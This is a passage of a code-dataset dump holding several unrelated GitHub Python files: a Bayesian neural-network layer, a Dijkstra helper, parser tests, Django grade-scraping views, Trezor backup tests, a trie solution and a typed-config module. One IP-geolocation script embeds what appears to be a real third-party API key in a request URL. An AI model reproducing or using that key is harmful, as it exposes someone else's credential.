b))\n\n","repo_name":"ImranYagizarov/GB_GitHub","sub_path":"Task 3.1.py","file_name":"Task 3.1.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24601837084","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\nFile containing classes used to implement a Bayesian Neural Network Layer.\n GaussianDistribution - Trainable Distribution used for the posterior of a Bayesian layer.\n ScaleMixtureGaussian - Distribution used for the prior of a Bayesian layer.\n BayesianLinearLayer - Bayesian Fully Connected Layer.\n\"\"\"\n\n\n# Built-in/Generic Imports\nimport math\n\n# Library Imports\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\n__author__ = [\"Jacob Carse\", \"Andres Alvarez Olmo\"]\n__copyright__ = \"Copyright 2022, Calibration\"\n__credits__ = [\"Jacob Carse\", \"Andres Alvarez Olmo\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer = [\"Jacob Carse\", \"Andres Alvarez Olmo\"]\n__email__ = [\"j.carse@dundee.ac.uk\", \"alvarezolmoandres@gmail.com\"]\n__status__ = \"Development\"\n\n\nclass GaussianDistribution:\n \"\"\"\n Trainable Distribution used as parameter for weight and bias in Bayesian layers.\n init - Initialise for the distribution.\n sigma - Calculates the sigma.\n sample_distribution - Samples a parameter from the distribution.\n log_posterior - Calculate the log posterior from a sampled parameter.\n \"\"\"\n\n def __init__(self, mu: torch.Tensor, rho: torch.Tensor, device: torch.device) -> None:\n \"\"\"\n Initialiser for the Distribution that saves parameters and defines a Normal distribution for the parameter.\n :param mu: The mean of the distribution.\n :param rho: The variance of the distribution.\n :param device: The PyTorch device the distribution will be stored on.\n \"\"\"\n\n self.mu = mu\n self.rho = rho\n self.device = device\n self.normal = torch.distributions.Normal(0, 1, validate_args=True)\n\n def sigma(self) -> torch.Tensor:\n \"\"\"\n Calculates the sigma of the distribution.\n :return: Torch Tensor of the sigma of the distribution.\n \"\"\"\n\n return torch.log1p(torch.exp(self.rho))\n\n def sample_distribution(self) -> torch.Tensor:\n \"\"\"\n Samples the normal distribution using the mean, variance and sigma.\n :return: Torch Tensor of the sampled parameters.\n \"\"\"\n\n e = self.normal.sample(self.rho.size()).to(self.device)\n return self.mu + self.sigma() * e\n\n def log_posterior(self, input: torch.Tensor) -> float:\n \"\"\"\n Calculates the log posterior for the sampled parameters.\n :param input: Torch Tensor with the sampled parameters.\n :return: Value with the log posterior.\n \"\"\"\n\n return (-math.log(math.sqrt(2 * math.pi)) - torch.log(self.sigma()) -\n ((input - self.mu) ** 2) / (2 * self.sigma() ** 2)).sum()\n\n\nclass ScaleMixtureGaussian:\n \"\"\"\n ScaleMixture model used as a prior for the weight and bias in a Bayesian Layer.\n init - Initialiser for the Scale Mixture Gaussian Distribution.\n log_prob - Calculates the log prior probability for the sampled parameter.\n \"\"\"\n\n def __init__(self, pi: torch.Tensor, sigma_1: torch.Tensor, sigma_2: torch.Tensor, device: torch.device) -> None:\n \"\"\"\n Initialiser for the Scale Mixture Gaussian Distribution a distribution used as the prior of a Bayesian layer.\n :param pi: Weighting for balancing the two Gaussian distributions.\n :param sigma_1: The variance for the first Gaussian distribution.\n :param sigma_2: The variance for the second Gaussian distribution.\n :param device: The device the distribution will be initialised on.\n \"\"\"\n\n self.pi = pi\n self.sigma_1 = sigma_1\n self.sigma_2 = sigma_2\n self.device = device\n self.gaussian_1 = torch.distributions.Normal(torch.tensor(0).to(device), sigma_1, validate_args=True)\n self.gaussian_2 = torch.distributions.Normal(torch.tensor(0).to(device), sigma_2, validate_args=True)\n\n def log_prob(self, input: torch.Tensor) -> float:\n \"\"\"\n Calculates the log_likelihood for each parameter sampled relative to a prior distribution.\n :param input: Torch.Tensor of the sampled parameters\n :return: The log probability of the input relative to the prior.\n \"\"\"\n\n prob_1 = torch.exp(self.gaussian_1.log_prob(input))\n prob_2 = torch.exp(self.gaussian_2.log_prob(input))\n\n return (torch.log(self.pi * prob_1 + (1 - self.pi) * prob_2)).sum()\n\n\nclass BayesianLinearLayer(nn.Module):\n \"\"\"\n Class for a Bayesian Fully Connected Layer that can be used to form a Bayesian Neural Network.\n init - Initialiser for the Bayesian layer that initialises the distributions for weights and biases.\n forward - Forward Propagation for the Bayesian Layer by sampling from the weight and bias distributions.\n \"\"\"\n\n def __init__(self, in_features: int, out_features: int, device: torch.device) -> None:\n \"\"\"\n Initialiser for the Bayesian Layer that initialises the distributions for the weights and biases.\n :param in_features: Integer for the number of input features in the layer.\n :param out_features: Integer for the number of output features in the layer.\n :param device: PyTorch Device the layer will be loaded on.\n \"\"\"\n\n # Calls the super for the nn.Module.\n super(BayesianLinearLayer, self).__init__()\n\n # Saves the number of in and out features in the class.\n self.in_features = in_features\n self.out_features = out_features\n\n # The parameter initialisation for the weights.\n self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features).normal_(0, 0.1))\n self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).normal_(-7, 0.1))\n self.weight = GaussianDistribution(self.weight_mu, self.weight_rho, device)\n\n # The parameter initialisation for the biases.\n self.bias_mu = nn.Parameter(torch.Tensor(out_features).normal_(0, 0.1))\n self.bias_rho = nn.Parameter(torch.Tensor(out_features).normal_(-7, 0.1))\n self.bias = GaussianDistribution(self.bias_mu, self.bias_rho, device)\n\n # The parameter initialisation for the prior distribution.\n sigma_1 = torch.FloatTensor([math.exp(0.1)]).to(device)\n sigma_2 = torch.FloatTensor([math.exp(0.4)]).to(device)\n pi = torch.tensor(0.5).to(device)\n\n # The initialisation for the weight and bias priors.\n self.weight_prior = ScaleMixtureGaussian(pi, sigma_1, sigma_2, device)\n self.bias_prior = ScaleMixtureGaussian(pi, sigma_1, sigma_2, device)\n\n # Creates the class member for the log prior and log variational posterior.\n self.log_prior = 0\n self.log_variational_posterior = 0\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Performs forward propagation with the layer by sampling the weights and biases from the distibutions.\n :param x: PyTorch Tensor for the input image batch.\n :return: PyTorch Tensor of logits.\n \"\"\"\n\n # Samples the weight and bias from the distibutions.\n weight = self.weight.sample_distribution()\n bias = self.bias.sample_distribution()\n\n # Calculates the log prior and log variational posterior.\n self.log_prior = self.weight_prior.log_prob(weight) + self.bias_prior.log_prob(bias)\n self.log_variational_posterior = self.weight.log_posterior(weight) + self.bias.log_posterior(bias)\n\n # Performs forward propagation with the sampled weight and bias.\n return F.linear(x, weight, bias)\n","repo_name":"UoD-CVIP/Medical_Calibration","sub_path":"bayes_layers.py","file_name":"bayes_layers.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"74847551801","text":"import heapq\nimport time\nfrom typing import List, NamedTuple, Any\n\n\nclass Move(NamedTuple):\n score: int\n step_count: int\n state: Any\n path: List[Any]\n\n\nclass Step(NamedTuple):\n cost: int\n state: Any\n\n\nclass Dijkstra:\n def __init__(self, initial_state):\n self.visited = set()\n self.queue = []\n self.best = float(\"inf\")\n self.best_path = None\n self.pruned = 0 # removed because a shorter path has been found already\n self.duplicates = 0 # path ignored because node has already been visited\n self.iterations = 0\n self.report_rate = 1000 # print progress after this many iterations\n self.store_path = False\n self.add_move(0, initial_state, [])\n self.start_time = 0\n self.end_time = 0\n\n @property\n def time_taken(self):\n return self.end_time - self.start_time\n\n def add_move(self, step_count: int, state: Any, current_path: List):\n self.visited.add(self.serialise(state))\n path = []\n if self.store_path:\n path = current_path[:]\n path.append(state)\n heapq.heappush(self.queue, Move(score=self.score(state), step_count=step_count, state=state, path=path))\n\n @staticmethod\n def serialise(state):\n raise NotImplementedError\n\n def score(self, state) -> int:\n \"\"\"Lower is better. 0 is winner\"\"\"\n return 0\n\n def valid_moves(self, state) -> List[Step]:\n raise NotImplementedError\n\n def search(self):\n self.start_time = time.process_time()\n while self.queue:\n move: Move = heapq.heappop(self.queue)\n self.iterations += 1\n\n if move.score == 0:\n self.best = min(self.best, move.step_count)\n self.best_path = move.path\n continue\n self.queue_new_moves(move)\n self.report()\n\n self.end_time = time.process_time()\n return self.best\n\n def report(self):\n if self.iterations % self.report_rate:\n return\n print(f\"{self.iterations:6} Q:{len(self.queue):6} Prune:{self.pruned:6} Dups:{self.duplicates:6} Best:{self.best}\")\n\n def queue_new_moves(self, move):\n for cost, new_move_state in self.valid_moves(move.state):\n new_step_count = move.step_count + cost\n if self.serialise(new_move_state) in self.visited:\n self.duplicates += 1\n continue\n if new_step_count >= self.best:\n self.pruned += 1\n continue\n self.add_move(new_step_count, new_move_state, move.path)\n","repo_name":"heroworkshop/advent_of_code","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8049075413","text":"import pytest\n\nfrom ..manifest.manifest import split_header, Header, HeaderParser, ManifestError\n\n\ndef test_split_header():\n assert split_header(b'header\\n---\\ndata') == (b'header', b'data')\n assert split_header(b'\\n---\\ndata') == (b'', b'data')\n assert split_header(b'\\n---\\n') == (b'', b'')\n assert split_header(b'---\\ndata') == (b'', b'data')\n assert split_header(b'---\\n') == (b'', b'')\n with pytest.raises(ManifestError):\n split_header(b'--\\nno newline')\n with pytest.raises(ManifestError):\n split_header(b'no header')\n with pytest.raises(ManifestError):\n split_header(b'foo\\n-- \\nbar')\n\n\ndef test_parse_header():\n data = b'''\\\nsignature: |\n line 1\n line 2\n'''\n header = Header.from_bytes(data)\n assert header.signature == 'line 1\\nline 2'\n\n\ndef test_parse_header_empty():\n data = b''\n header = Header.from_bytes(data)\n assert header.signature is None\n\n\ndef test_parse_header_with_pubkey():\n # Pubkey is ignored, but a header should still be parsed.\n data = b'''\\\nsignature: |\n line 1\n line 2\npubkey: |\n line 3\n line 4\n'''\n header = Header.from_bytes(data)\n assert header.signature == 'line 1\\nline 2'\n\n\ndef test_header_to_bytes():\n header = Header('line 1\\nline 2')\n data = header.to_bytes()\n assert data == b'''\\\nsignature: |\n line 1\n line 2'''\n\n\ndef test_header_empty_to_bytes():\n header = Header(None)\n data = header.to_bytes()\n assert data == b''\n\n\ndef test_parser():\n parser = HeaderParser(b'''\\\nfoo: \"foo\"\nbar: |\n bar\n\n lines\nbaz: \"baz\"\n''')\n assert parser.parse_field() == ('foo', 'foo')\n assert parser.parse_field() == ('bar', 'bar\\n\\nlines')\n assert parser.parse_field() == ('baz', 'baz')\n assert parser.is_eof()\n\n\ndef test_parser_error():\n with pytest.raises(ManifestError, match='Unexpected line'):\n HeaderParser(b'foo: unquoted').parse_field()\n with pytest.raises(ManifestError, match='Unexpected line'):\n HeaderParser(b'foo: \"illegal\\\"characters\"').parse_field()\n with pytest.raises(ManifestError, match='Block literal cannot be empty'):\n HeaderParser(b'foo: |\\nbar: \"empty block\"').parse_field()\n\n with pytest.raises(ManifestError, match='Unexpected field'):\n HeaderParser(b'bar: \"wrong field\"').parse('baz')\n with pytest.raises(ManifestError, match='Duplicate field'):\n HeaderParser(b'bar: \"once\"\\nbar: \"twice\"').parse('bar')\n","repo_name":"golemfoundation/wildland-client","sub_path":"wildland/tests/test_manifest_header.py","file_name":"test_manifest_header.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8537364217","text":"# -*- coding: utf-8 -*-\n\nfrom urllib2 import urlopen\nfrom django.conf import settings\n\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom common.http import install_wapiti_opener\nfrom common.common import find_string_between\nfrom grades.serializers import WapitiLoginSerializer\nfrom grades.parsers import (SchoolGradesParser, SchoolJuriesParser,\n SchoolCertificationsParser, SchoolYearsParser)\n\n\ndef get_years_urls(url):\n \"\"\"\n From default school grades page you have a list of all your years spent in\n Telecom. This function list those years by reading available links via\n SchoolYearsParser and return a dictionnary with keys being ['grades',\n 'juries', 'certifs'] and values a list of relative links.\n\n Ex: {'grades': ['/Commun/ens/adm/pf/pgs/etudiant/consulterResSco.aspx?' \\\\\n 'anSco=19&rangEtu=35 sur 83', link2, link3, ...],\n 'juries': [link1, link2, ...],\n 'certifs': [link1, link2, ...]}\n \"\"\"\n\n list_years_html = urlopen(url)\n\n list_years_data = \"\"\n for line in list_years_html.readlines():\n line = line.strip()\n list_years_data += line\n\n parser = SchoolYearsParser()\n parser.feed(list_years_data)\n\n years_urls = {}\n years_urls['grades'] = parser.grades_years\n years_urls['juries'] = parser.juries_years\n years_urls['certifs'] = parser.certifications_years\n\n parser.close()\n\n return years_urls\n\n\ndef get_year_grades(year_grades_url):\n \"\"\"\n Make use of SchoolGradesParser to parse all available data on your school\n year grades pages and compact it in one big JSON structure.\n\n Some data like the number of students and year id cannot be fetched on the\n page so the url to access the page is used instead.\n \"\"\"\n\n year_grades_html = urlopen(year_grades_url)\n\n year_grades_data = \"\"\n for line in year_grades_html.readlines():\n year_grades_data += line\n\n parser = SchoolGradesParser()\n parser.feed(year_grades_data)\n year_grades = parser.grades\n parser.close()\n\n # Workaround to get number of students in your schoolyear as well as\n # year `id`. I don't know why it is not accessible on the page...\n # Url example : '/Commun/ens/adm/pf/pgs/etudiant/consulterResSco.aspx?' \\\n # 'anSco=19&rangEtu=35 sur 83'\n # Note : I don't know exactly where does year id come from, but I suspect\n # it to be an incremented value since the year they released this grades\n # app. In this case, it would be school year 1995-1996 which could be\n # matching the first year of the first FIs.\n students = find_string_between(year_grades_url, 'sur ', None)\n year_id = find_string_between(year_grades_url, 'anSco=', '&rangEtu')\n\n year_grades['students'] = students\n year_grades['year_id'] = year_id\n\n return year_grades\n\n\ndef get_year_juries(year_juries_url):\n year_juries_html = urlopen(year_juries_url)\n\n year_juries_data = \"\"\n for line in year_juries_html.readlines():\n year_juries_data += line\n\n parser = SchoolJuriesParser()\n parser.feed(year_juries_data)\n year_juries = parser.juries\n parser.close()\n\n return year_juries\n\n\ndef get_year_certifications(year_certifications_url):\n year_certifications_html = urlopen(year_certifications_url)\n\n year_certifications_data = \"\"\n for line in year_certifications_html.readlines():\n year_certifications_data += line\n\n parser = SchoolCertificationsParser()\n parser.feed(year_certifications_data)\n year_certifications = parser.certifications\n parser.close()\n\n return year_certifications\n\n\n@permission_classes((AllowAny,))\nclass MyGradesView(APIView):\n \"\"\"\n === Access your school grades via webservice ! ===\n\n Anyone can access it since it does not provide anything else than what you\n can read on your wapiti pages. That's also why you need to provide your\n wapiti credentials each time your make a request here.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n === Return your school grades in JSON ===\n\n Since the amount of collected data can be huge depending on the number\n of years the student spent in Telecom Lille ;), and as swagger does not\n allow to format output with carriage return, an exemple of output can\n be found here : http://wiki.bdetl.org/doku.php?id=okapi_grades.\n\n You need to provide some JSON data in order to be able to access this\n endpoint. Indeed, Wapiti and Okapi credentials do not necessarly share\n the same login credentials. It will often be the same, but a student\n can gradute or can forget to synchronize his old password...\n\n Anyway, you need to provide wapiti_username and wapiti_password in\n application/form-data JSON. Keep always in mind that to access a\n resource on Wapiti you need to prefix your username by `elv/`. An error\n will remind you that if your loggin fails and your forget this prefix.\n It could be automaticaly added, but this kind of automation is more\n likely to be handled on user interface than on backend.\n\n Since you need to provide some application/form-data on a GET method,\n which is unorthodox, django rest framework tools do not provide\n built-in views to test the API... sorry for the inconvenience...\n \"\"\"\n\n serializer = WapitiLoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n wapiti_url = settings.WAPITI['url']\n user = serializer.validated_data['wapiti_username']\n passwd = serializer.validated_data['wapiti_password']\n install_wapiti_opener(wapiti_url, user, passwd)\n\n wapiti_login_url = '{}{}'.format(wapiti_url, settings.WAPITI['login'])\n urlopen(wapiti_login_url)\n\n years_overview_url = '{}{}'.format(\n wapiti_url, settings.WAPITI['years_overview'])\n grades_years_urls = get_years_urls(years_overview_url)['grades']\n\n grades = []\n for school_year_url in grades_years_urls:\n year_grades_url = '{}{}'.format(wapiti_url, school_year_url)\n year_grades = get_year_grades(year_grades_url)\n grades.append(year_grades)\n\n return Response(grades, status=status.HTTP_200_OK)\n\n\n@permission_classes((AllowAny,))\nclass MyJuriesView(APIView):\n \"\"\"\n === Access your school juries via webservice ! ===\n\n Anyone can access it since it does not provide anything else than what you\n can read on your wapiti pages. That's also why you need to provide your\n wapiti credentials each time your make a request here.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n === Return your school juries in JSON ===\n\n You need to provide some JSON data in order to be able to access this\n endpoint. Indeed, Wapiti and Okapi credentials do not necessarly share\n the same login credentials. It will often be the same, but a student\n can gradute or can forget to synchronize his old password...\n\n Anyway, you need to provide wapiti_username and wapiti_password in\n application/form-data JSON. Keep always in mind that to access a\n resource on Wapiti you need to prefix your username by `elv/`. An error\n will remind you that if your loggin fails and your forget this prefix.\n It could be automaticaly added, but this kind of automation is more\n likely to be handled on user interface than on backend.\n\n Since you need to provide some application/form-data on a GET method,\n which is unorthodox, django rest framework tools do not provide\n built-in views to test the API... sorry for the inconvenience...\n \"\"\"\n\n serializer = WapitiLoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n wapiti_url = settings.WAPITI['url']\n user = serializer.validated_data['wapiti_username']\n passwd = serializer.validated_data['wapiti_password']\n install_wapiti_opener(wapiti_url, user, passwd)\n\n wapiti_login_url = '{}{}'.format(wapiti_url, settings.WAPITI['login'])\n urlopen(wapiti_login_url)\n\n years_overview_url = '{}{}'.format(\n wapiti_url, settings.WAPITI['years_overview'])\n juries_years_urls = get_years_urls(years_overview_url)['juries']\n\n juries = []\n for school_year_url in juries_years_urls:\n year_juries_url = '{}{}'.format(wapiti_url, school_year_url)\n year_juries = get_year_juries(year_juries_url)\n juries.append(year_juries)\n\n return Response(juries, status=status.HTTP_200_OK)\n\n\n@permission_classes((AllowAny,))\nclass MyCertificationsView(APIView):\n \"\"\"\n === Access your school certifications via webservice ! ===\n\n Anyone can access it since it does not provide anything else than what you\n can read on your wapiti pages. That's also why you need to provide your\n wapiti credentials each time your make a request here.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n === Return your school certifications in JSON ===\n\n School certifications are english, german, spanish and whatsoever\n language exams that you can take in Telecom Lille. Results are\n supposed to be identical for each year. Despite that, a list item per\n year is returned in case one day there are different values.\n\n You need to provide some JSON data in order to be able to access this\n endpoint. Indeed, Wapiti and Okapi credentials do not necessarly share\n the same login credentials. It will often be the same, but a student\n can gradute or can forget to synchronize his old password...\n\n Anyway, you need to provide wapiti_username and wapiti_password in\n application/form-data JSON. Keep always in mind that to access a\n resource on Wapiti you need to prefix your username by `elv/`. An error\n will remind you that if your loggin fails and your forget this prefix.\n It could be automaticaly added, but this kind of automation is more\n likely to be handled on user interface than on backend.\n\n Since you need to provide some application/form-data on a GET method,\n which is unorthodox, django rest framework tools do not provide\n built-in views to test the API... sorry for the inconvenience...\n \"\"\"\n\n serializer = WapitiLoginSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n wapiti_url = settings.WAPITI['url']\n user = serializer.validated_data['wapiti_username']\n passwd = serializer.validated_data['wapiti_password']\n install_wapiti_opener(wapiti_url, user, passwd)\n\n wapiti_login_url = '{}{}'.format(wapiti_url, settings.WAPITI['login'])\n urlopen(wapiti_login_url)\n\n years_overview_url = '{}{}'.format(\n wapiti_url, settings.WAPITI['years_overview'])\n certifs_years_urls = get_years_urls(years_overview_url)['certifs']\n\n certifs = []\n for school_year_url in certifs_years_urls:\n year_certifs_url = '{}{}'.format(wapiti_url, school_year_url)\n year_certifs = get_year_certifications(year_certifs_url)\n certifs.append(year_certifs)\n\n return Response(certifs, status=status.HTTP_200_OK)\n","repo_name":"jbbqqf/okapi","sub_path":"grades/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14954415787","text":"# import execjs\n\n# def get_js():\n# f = open(\"Samples/GetLocJS.js\", 'r', encoding='utf-8')\n# line = f.readline()\n# htmlstr = ''\n# while line:\n# htmlstr = htmlstr+line\n# line = f.readline()\n# return htmlstr\n\n# def get_des_psswd(): \n# js_str = get_js()\n# ctx = execjs.compile(js_str) #加载JS文件\n# return (ctx.call('getLocation')) #调用js方法 第一个参数是JS的方法名,后面的data和key是js方法的参数\n\nfrom urllib.request import urlopen\nimport json\n\nmy_ip = urlopen('http://ip.42.pl/raw').read()\nip_str = str(my_ip.decode())\n\nresponse = urlopen(\"https://restapi.amap.com/v3/ip?key=24c1ffc0a6c3d2f1d06570335356875d&ip=\" + ip_str)\njs = json.load(response)\nstatus = js['status']\nif not status == '1':\n print(\"error\")\nrect = js['rectangle']\ncord_list = rect.split(';')\ncord1_long = float(cord_list[0].split(',')[0])\ncord1_lan = float(cord_list[0].split(',')[1])\ncord2_long = float(cord_list[1].split(',')[0])\ncord2_lan = float(cord_list[1].split(',')[1])\ncord_cen_long = (cord1_long + cord2_long) / 2\ncord_cen_lan = (cord1_lan + cord2_lan) / 2\nprint(cord_cen_long)\nprint(cord_cen_lan)\n\nimport socket\n\ntry: \n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) \n s.connect(('8.8.8.8',80)) \n ip = s.getsockname()[0] \nfinally: \n s.close() \nprint(ip) ","repo_name":"chengtianle1997/xiaoshutong_chatting_robot","sub_path":"Samples/GetLocJS.py","file_name":"GetLocJS.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36040314260","text":"from itertools import combinations\n\nimport pytest\nfrom shamir_mnemonic import MnemonicError, shamir\n\nfrom trezorlib import device\nfrom trezorlib.debuglink import TrezorClientDebugLink as Client\nfrom trezorlib.exceptions import TrezorFailure\nfrom trezorlib.messages import BackupType\n\nfrom ...common import EXTERNAL_ENTROPY, WITH_MOCK_URANDOM, generate_entropy\nfrom ...input_flows import InputFlowSlip39BasicResetRecovery\n\npytestmark = [pytest.mark.skip_t1]\n\n\ndef reset_device(client: Client, strength: int):\n member_threshold = 3\n\n with WITH_MOCK_URANDOM, client:\n IF = InputFlowSlip39BasicResetRecovery(client)\n client.set_input_flow(IF.get())\n\n # No PIN, no passphrase, don't display random\n device.reset(\n client,\n display_random=False,\n strength=strength,\n passphrase_protection=False,\n pin_protection=False,\n label=\"test\",\n language=\"en-US\",\n backup_type=BackupType.Slip39_Basic,\n )\n\n # generate secret locally\n internal_entropy = client.debug.state().reset_entropy\n secret = generate_entropy(strength, internal_entropy, EXTERNAL_ENTROPY)\n\n # validate that all combinations will result in the correct master secret\n validate_mnemonics(IF.mnemonics, member_threshold, secret)\n\n # Check if device is properly initialized\n assert client.features.initialized is True\n assert client.features.needs_backup is False\n assert client.features.pin_protection is False\n assert client.features.passphrase_protection is False\n assert client.features.backup_type is BackupType.Slip39_Basic\n\n # backup attempt fails because backup was done in reset\n with pytest.raises(TrezorFailure, match=\"ProcessError: Seed already backed up\"):\n device.backup(client)\n\n\n@pytest.mark.setup_client(uninitialized=True)\ndef test_reset_device_slip39_basic(client: Client):\n reset_device(client, 128)\n\n\n@pytest.mark.setup_client(uninitialized=True)\ndef test_reset_device_slip39_basic_256(client: Client):\n reset_device(client, 256)\n\n\ndef validate_mnemonics(mnemonics, threshold, expected_ems):\n # We expect these combinations to recreate the secret properly\n for test_group in combinations(mnemonics, threshold):\n groups = shamir.decode_mnemonics(test_group)\n ems = shamir.recover_ems(groups)\n assert expected_ems == ems.ciphertext\n # We expect these combinations to raise MnemonicError\n for test_group in combinations(mnemonics, threshold - 1):\n with pytest.raises(MnemonicError, match=f\".*Expected {threshold} mnemonics.*\"):\n shamir.combine_mnemonics(test_group)\n","repo_name":"trezor/trezor-firmware","sub_path":"tests/device_tests/reset_recovery/test_reset_slip39_basic.py","file_name":"test_reset_slip39_basic.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":1147,"dataset":"github-code","pt":"40"} +{"seq_id":"24460770723","text":"REVERSE_KEYBOARD = {\n \"a\": \"2\", \"b\": \"2\", \"c\": \"2\",\n \"d\": \"3\", \"e\": \"3\", \"f\": \"3\",\n \"g\": \"4\", \"h\": \"4\", \"i\": \"4\",\n \"j\": \"5\", \"k\": \"5\", \"l\": \"5\",\n \"m\": \"6\", \"n\": \"6\", \"o\": \"6\",\n \"p\": \"7\", \"q\": \"7\", \"r\": \"7\", \"s\": \"7\",\n \"t\": \"8\", \"u\": \"8\", \"v\": \"8\",\n \"w\": \"9\", \"x\": \"9\", \"y\": \"9\", \"z\": \"9\",\n}\nclass TrieNode:\n def __init__(self):\n self.word_count = 0\n self.children = {}\n\n def add(self, word):\n node = self\n for char in word:\n if char not in node.children:\n node.children[char] = TrieNode()\n node = node.children[char]\n node.word_count += 1\n\nclass Solution:\n \"\"\"\n @param queries: the queries\n @param dict: the words\n @return: return the queries' answer\n \"\"\"\n def letterCombinationsII(self, queries, dict):\n root = TrieNode()\n for word in dict:\n digit_word = ''.join([REVERSE_KEYBOARD[char] for char in word])\n root.add(digit_word)\n\n res = []\n for query in queries:\n node = root\n for digit in query:\n if digit not in node.children:\n node = None\n break\n node = node.children[digit]\n res.append(node.word_count if node else 0)\n return res\nif __name__ == '__main__':\n query = [\"2\", \"3\", \"4\"]\n dict = [\"a\", \"abc\", \"de\", \"fg\"]\n s = Solution()\n print(s.letterCombinationsII(query, dict))","repo_name":"HaydenInEdinburgh/LintCode","sub_path":"270_letter_combinations_of_a_phone_number_II.py","file_name":"270_letter_combinations_of_a_phone_number_II.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17224649361","text":"#!/usr/bin/env python\n\n\"\"\"\nBuilds a configuration object out of type annotations.\n\nDefine a subclass with annotations:\n\n>>> class BasicConfig(TypedConfig):\n... INTEGER: int\n... FLOAT: float\n... COMPLEX: complex\n... BOOLEAN: bool\n... STRING: str\n\nProvide required values in the environment or other means supported by python-decouple:\n\n>>> import os\n>>> os.environ.update({\"INTEGER\": \"6\",\n... \"FLOAT\": \"5.6\",\n... \"COMPLEX\": \"3+4j\",\n... \"BOOLEAN\": \"true\",\n... \"STRING\": \"abcdefg\"})\n\nConfiguration is evaluated at instantiation time:\n\n>>> c = BasicConfig()\n>>> c.INTEGER, c.FLOAT, c.COMPLEX, c.BOOLEAN, c.STRING\n(6, 5.6, (3+4j), True, 'abcdefg')\n\nValues without defaults are required:\n\n>>> class RequiredConfig(TypedConfig):\n... MUST_HAVE: str\n>>> RequiredConfig()\nTraceback (most recent call last):\n ...\ndecouple.UndefinedValueError: MUST_HAVE not found. Declare it as envvar or define a default value.\n\nValues with optional types have a default value of None:\n\n>>> class OptionalConfig(TypedConfig):\n... MAYBE: t.Optional[int]\n>>> c = OptionalConfig()\n>>> c.MAYBE is None\nTrue\n\nValues with literal assignments get that value by default:\n\n>>> class DefaultConfig(TypedConfig):\n... DEFAULT: float = 5.8\n>>> DefaultConfig().DEFAULT\n5.8\n\nBut default values are still overridden by the environment or settings:\n\n>>> os.environ[\"DEFAULT\"] = \"2\"\n>>> DefaultConfig().DEFAULT\n2.0\n\nOf course this applies to optional types as well:\n\n>>> os.environ[\"MAYBE\"] = \"4\"\n>>> OptionalConfig().MAYBE\n4\n\nList annotations are automatically cast using decouple.Csv:\n\n>>> os.environ[\"FLOATS\"] = \"2,3.6,7\"\n>>> class ListConfig(TypedConfig):\n... FLOATS: t.List[float]\n>>> ListConfig().FLOATS\n[2.0, 3.6, 7.0]\n\nBut can still be optional or have defaults:\n\n>>> class DefaultListConfig(TypedConfig):\n... MAYBE_STRINGS: t.Optional[t.List[str]]\n... INTEGERS: t.List[int] = \" 4, 100, 12\"\n>>> c = DefaultListConfig()\n>>> c.MAYBE_STRINGS is None, c.INTEGERS\n(True, [4, 100, 12])\n\nYou can provide additional casts for types:\n\n>>> import pathlib as p, base64\n>>> os.environ['BIN64'] = 'aGVsbG8gd29ybGQ='\n>>> class PathConfig(TypedConfig):\n... SOMEWHERE: p.Path = '/tmp'\n... BIN64: bytes\n>>> c = PathConfig({p.Path: p.Path, bytes: lambda s: base64.b64decode(str.encode(s))})\n>>> c.SOMEWHERE.name, c.BIN64\n('tmp', b'hello world')\n\nNames starting with underscores are ignored.\nNames can be explicitly ignored as well.\nThis is useful when you want to provide a literal or your own config manually.\n\n>>> class IgnoredValueConfig(TypedConfig):\n... NORMAL_BYTES: bytes = 'hi'\n... APP_PATH = p.Path(__file__).parent.absolute()\n... _NOTHING: int\n... BIN64: bytes = decouple.config('BIN64', cast=lambda s: base64.b64decode(str.encode(s)))\n>>> c = IgnoredValueConfig(ignored_names={'APP_PATH', 'BIN64'})\n>>> c.APP_PATH.name\n'typed-config'\n>>> hasattr(c, '_NOTHING')\nFalse\n\nIt's also the only way to cast one type two different ways.\n\n>>> c.NORMAL_BYTES, c.BIN64\n(b'hi', b'hello world')\n\"\"\"\n\nimport functools, typing as t, decouple, distutils.util\n\n\n##\n# We need to map all supported type annotations into cast functions.\n# A cast function is a function that takes a string and returns a particular type.\n# Most primitive types in Python already do this: int('9') -> 9.\nSomeType = t.TypeVar('SomeType')\nCastType = t.Callable[[t.Optional[str]], t.Optional[SomeType]]\n\n\ndef optional(cast: t.Callable[[str], SomeType]) -> CastType:\n \"\"\"A decorator that takes a cast function and returns an optional cast function.\"\"\"\n 